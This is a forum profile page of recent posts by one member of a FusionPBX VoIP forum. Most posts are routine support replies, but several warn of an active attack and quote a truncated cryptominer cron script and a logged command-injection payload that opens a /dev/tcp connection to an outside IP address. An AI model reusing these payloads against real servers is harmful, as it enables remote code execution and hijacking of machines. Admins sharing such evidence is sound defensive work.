Recent content by DigitalDaz

  1. DigitalDaz

    FusionPBX 5.32 not sending correct SIP Headers

    This is a gateway? If so, post your gateway configuration.
  2. DigitalDaz

    smtp setup

    Is there a question here?
  3. DigitalDaz

    Passkeys for FusionPBX

    That's excellent news :)
  4. DigitalDaz

    Passkeys for FusionPBX

    hmmm.... if it had, I didn't see it, nor in the docs. I can see 2FA using an authenticator app or email
  5. DigitalDaz

    Passkeys for FusionPBX

    All done by claude code, its crazy what AI can do so easily.
  6. DigitalDaz

    Passkeys for FusionPBX

  7. DigitalDaz

    Passkeys for FusionPBX

  8. DigitalDaz

    Passkeys for FusionPBX

    I've added a passkey feature to a new installation I just created, it seems to work perfectly:
  9. DigitalDaz

    Crypto Hacking Attempts going on now!!

    If anyone is interested, this is the cryptominer cronjob that gets installed: #!/bin/sh bg() { _bg_cmd="$1" if command -v setsid >/dev/null 2>&1; then setsid sh -c "$_bg_cmd" >/dev/null 2>&1 & elif command -v nohup >/dev/null 2>&1; then nohup sh -c "$_bg_cmd"...
  10. DigitalDaz

    Crypto Hacking Attempts going on now!!

    What I can see that seems to be the recent discovery is that this api could be used to execute commands on the OS. Even with the auth in place, that would imply a malicious user could do the same. ie sign up for your service and then send the bad message, I think the new freeswitch prevents that...
  11. DigitalDaz

    Crypto Hacking Attempts going on now!!

    Processing text message default->api+system%20command%20-v%20bash%3E/dev/null&&timeout%205%20bash%20-c%20'exec%203%3C%3E/dev/tcp/77.73.70.190/33375;exec%203%3E&-'%202%3E/dev/
  12. DigitalDaz

    Crypto Hacking Attempts going on now!!

    The api IS being used to download the files, if I remember rightly it executes some sort of curl command that pulls down the files, this also changes from time to time in what it does, I'll see if I can find the logs. What the script also does is sets up a cronjob under the user www-data so you...
  13. DigitalDaz

    SOLVED No outgoing calls

    Your issue is NAT anyway. The 32 second thing is a classic tell tale the ACK will not be getting to where it needs to be and I'm guessing you will be getting repeated 200OKs. The recovery on timer expire also indicates this. Are you able to post a pcap of the carrier leg of the call.
  14. DigitalDaz

    SOLVED No outgoing calls

    So is this question about fusionpbx or fspbx? Your post implies fusionpbx but this is the fspbx forum?
  15. DigitalDaz

    LAN/Local IP Address in Status > Registration <SOLVED>

    I don't believe its the nat detection, if the sip registration doesn't send it then its just not there, as mentioned above maybe pbxgeek can confirm, a quick scan of the current code showed that the call-id header wasn't being checked for local ips which in some configurations/algs means the...